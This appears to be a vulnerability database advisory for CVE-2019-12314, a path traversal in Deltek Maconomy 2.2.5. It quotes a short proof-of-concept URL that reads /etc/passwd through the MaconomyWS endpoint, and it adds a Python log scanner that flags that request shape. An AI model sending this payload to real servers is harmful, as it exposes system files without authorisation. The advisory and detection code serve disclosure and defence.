Deltek Maconomy Path Traversal Vulnerability

Vulnerability ID 1621276 Vulnerability type Path traversal
Published 2019-05-29 Updated 2019-11-06
CVE ID CVE-2019-12314 CNNVD-ID CNNVD-201905-985
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019050303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-985
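|Vulnerability details
Deltek Maconomy is an enterprise resource planning (ERP) software suite from the US company Deltek. Deltek Maconomy version 2.2.5 contains a path traversal vulnerability. The vulnerability stems from the network system or product failing to properly filter special elements in resource or file paths. An attacker can exploit it to access locations outside the restricted directory.
|Vulnerability exploit (EXP)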
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
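
A detection check for the request shape shown in the PoC above, as an added example that is not part of the original advisory or exploit text: it scans web-server access log lines for requests to the `MaconomyWS.macx1.W_MCS` endpoint whose remainder starts with a second slash, and goes slightly beyond the PoC by also flagging `..` segments and percent-encoded variants. The combined log format, the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

ENDPOINT = "MaconomyWS.macx1.W_MCS"  # endpoint name from the PoC URL on this page
# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs; the "/app" suffix is hypothetical).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2019:10:00:01 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/app HTTP/1.1" 200 512',
    '192.0.2.44 - - [22/May/2019:10:00:07 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.44 - - [22/May/2019:10:00:09 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS%2f%2fetc%2fhosts HTTP/1.1" 200 220',
    '192.0.2.7 - - [22/May/2019:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 99',
]


def decode_path(target):
    """Drop the query string, then percent-decode up to 3 times (double encoding)."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def suspicious_suffix(log_line):
    """Return the decoded text after the endpoint if it has the PoC shape, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    _, found, suffix = decode_path(m.group(1)).partition(ENDPOINT)
    if not found:
        return None
    # PoC shape: endpoint followed by "//<absolute path>"; ".." segments are flagged too.
    if suffix.startswith("//") or ".." in suffix.split("/"):
        return suffix
    return None


def scan(lines):
    """Return (client_ip, suffix) for every flagged line."""
    return [(line.split(" ", 1)[0], s) for line in lines
            if (s := suspicious_suffix(line)) is not None]


if __name__ == "__main__":
    for ip, suffix in scan(SAMPLE_LOG):
        print(ip, suffix)
```

A hit only shows that a request of this shape was made; the response status and size in the same log line indicate whether the server returned file content.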
|References

Source: github.com

Link: https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt

Source: MISC

Link: http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html

Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2019-12314

Source: packetstormsecurity.com

Link: https://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html